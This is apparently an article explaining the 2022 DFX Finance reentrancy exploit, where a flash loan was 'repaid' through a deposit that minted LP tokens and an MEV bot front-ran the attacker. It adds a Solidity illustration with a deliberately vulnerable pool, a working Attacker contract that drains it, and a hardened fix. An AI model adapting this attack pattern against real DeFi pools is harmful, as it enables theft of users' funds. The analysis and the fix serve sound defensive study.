Cointime


DFX Finance Smart Contract Vulnerability Explained

Cointime Official

by Shashank

Overview:

On 11 November 2022, a reentrancy attack drained a total of roughly $7.5M from DFX Finance's liquidity pools on Ethereum (the affected block, 15941904, is an Ethereum mainnet block). The attacker only managed to move about $4.3M worth of assets into their own wallet. The remaining portion, about $3.2M, was captured by an MEV bot that front-ran the exploit transaction by copying it. This is front-running by a generalized MEV bot, not a sandwich attack: the bot did not trade around the attacker's transaction, it replayed the exploit ahead of it.

Smart Contract Hack Overview:

  • Attacker’s address: 0x14c1
  • DFX Finance Code: 0x8888
  • MEV Bot Address & transaction: 0x6c6b
  • MEV Bot’s wallet address: 0xfde
  • Block in which the bot's copy of the exploit landed ahead of the attacker's own transaction: 15941904
  • MEV Bot & wallet transaction address analysis: 0xfde0d

Decoding the Smart Contract Vulnerability:

Figure: series of transactions connected to the attacker's wallet and the MEV bot
  • The pool's flash() function proved repayment only by comparing the pool's token balances before and after the borrower's callback. From inside that callback the attacker called deposit() with the borrowed tokens, which sent them straight back into the same pool and minted LP tokens to the attacker. The post-callback balance check therefore passed, so the flash loan was treated as repaid even though nothing had actually been returned: the pool counted the attacker's deposit as the repayment.
  • The reentrancy-guard modifier on withdraw() did not help, because the withdrawal was not the reentrant call. The reentrant call was the deposit() made while flash() was still executing, and nothing blocked it. Once flash() returned, the LP tokens minted during the callback still belonged to the attacker, who redeemed them with withdraw() in a separate, perfectly ordinary call and walked away with the pool's underlying tokens.
  • MEV bots were watching the mempool, so the attacker's transaction was copied and front-run by one of them. Roughly $3.2M of the drained funds went to the bot operator, and the attacker ended up with only about $4.3M of the stolen money.
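The following is an added, hypothetical illustration of the mechanism in the three points above; it is not DFX Finance's contract. It models a single-token pool with 1:1 LP minting, an assumed 0.05% flash fee, and invented names (VulnerablePool, HardenedPool, Attacker, flashCallback). VulnerablePool.flash() verifies repayment with a balance delta and holds no lock during the callback, so Attacker can "repay" with deposit() and cash out the LP afterwards; HardenedPool shares the reentrancy lock with deposit()/withdraw(), so the same deposit reverts.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Hypothetical single-token pool (not DFX Finance's code). Names, the fee and
// the 1:1 LP minting are simplifications chosen for clarity.

interface IERC20 {
    function balanceOf(address) external view returns (uint256);
    function transfer(address, uint256) external returns (bool);
    function transferFrom(address, address, uint256) external returns (bool);
    function approve(address, uint256) external returns (bool);
}

interface IFlashCallback {
    function flashCallback(uint256 fee, bytes calldata data) external;
}

contract VulnerablePool {
    IERC20 public immutable token;
    mapping(address => uint256) public lpBalance;
    uint256 public constant FEE_BPS = 5; // 0.05% flash fee (assumed value)
    uint256 private locked = 1;

    modifier nonReentrant() {
        require(locked == 1, "reentrant");
        locked = 2;
        _;
        locked = 1;
    }

    constructor(IERC20 _token) { token = _token; }

    // LP is minted 1:1 against deposited tokens to keep the arithmetic obvious.
    function deposit(uint256 amount) external nonReentrant {
        require(token.transferFrom(msg.sender, address(this), amount), "transferFrom");
        lpBalance[msg.sender] += amount;
    }

    // Guarded, but irrelevant to the exploit: the attacker calls it after
    // flash() has returned, when no lock is held.
    function withdraw(uint256 lp) external nonReentrant {
        lpBalance[msg.sender] -= lp; // reverts on underflow in 0.8
        require(token.transfer(msg.sender, lp), "transfer");
    }

    // VULNERABLE: repayment is proven only by a before/after balance comparison,
    // and no lock is held during the callback, so the borrower can "repay"
    // with deposit() and keep the LP that deposit() mints.
    function flash(uint256 amount, bytes calldata data) public virtual {
        uint256 before = token.balanceOf(address(this));
        uint256 fee = (amount * FEE_BPS) / 10_000;
        require(token.transfer(msg.sender, amount), "transfer");
        IFlashCallback(msg.sender).flashCallback(fee, data);
        require(token.balanceOf(address(this)) >= before + fee, "not repaid");
    }
}

// FIX: hold the same lock during flash() that deposit()/withdraw() use, so a
// deposit() made from inside the callback reverts with "reentrant".
contract HardenedPool is VulnerablePool {
    constructor(IERC20 _token) VulnerablePool(_token) {}

    function flash(uint256 amount, bytes calldata data) public override nonReentrant {
        super.flash(amount, data);
    }
}

// Attacker contract reproducing the sequence from the write-up. It must be
// funded with at least the flash fee before attack() is called.
contract Attacker is IFlashCallback {
    VulnerablePool private immutable pool;
    IERC20 private immutable token;

    constructor(VulnerablePool _pool) {
        pool = _pool;
        token = _pool.token();
    }

    function attack() external {
        uint256 loan = token.balanceOf(address(pool)); // borrow the whole pool
        pool.flash(loan, "");                          // step 1: flash loan
        // step 3: the loan has "settled", but the LP minted in step 2 is still ours
        pool.withdraw(pool.lpBalance(address(this)));
    }

    function flashCallback(uint256 /*fee*/, bytes calldata) external override {
        require(msg.sender == address(pool), "not pool");
        // step 2: deposit loan + fee back into the pool. The pool's balance is
        // restored, so flash()'s check passes, and the LP for the deposit is ours.
        uint256 amount = token.balanceOf(address(this));
        token.approve(address(pool), amount);
        pool.deposit(amount);
    }
}
```

Deploy either pool with a mock ERC20, seed the pool with liquidity and the Attacker with at least the fee, then call attack(). Against VulnerablePool the pool's balance drops to zero and the Attacker holds everything it borrowed; against HardenedPool the inner deposit() hits the shared lock and the whole transaction reverts with "reentrant". A shared lock is the minimal fix; the more robust one is to stop inferring repayment from a balance delta at all and instead require the borrower to transfer the principal plus fee back explicitly, so that an LP deposit can never be mistaken for repayment.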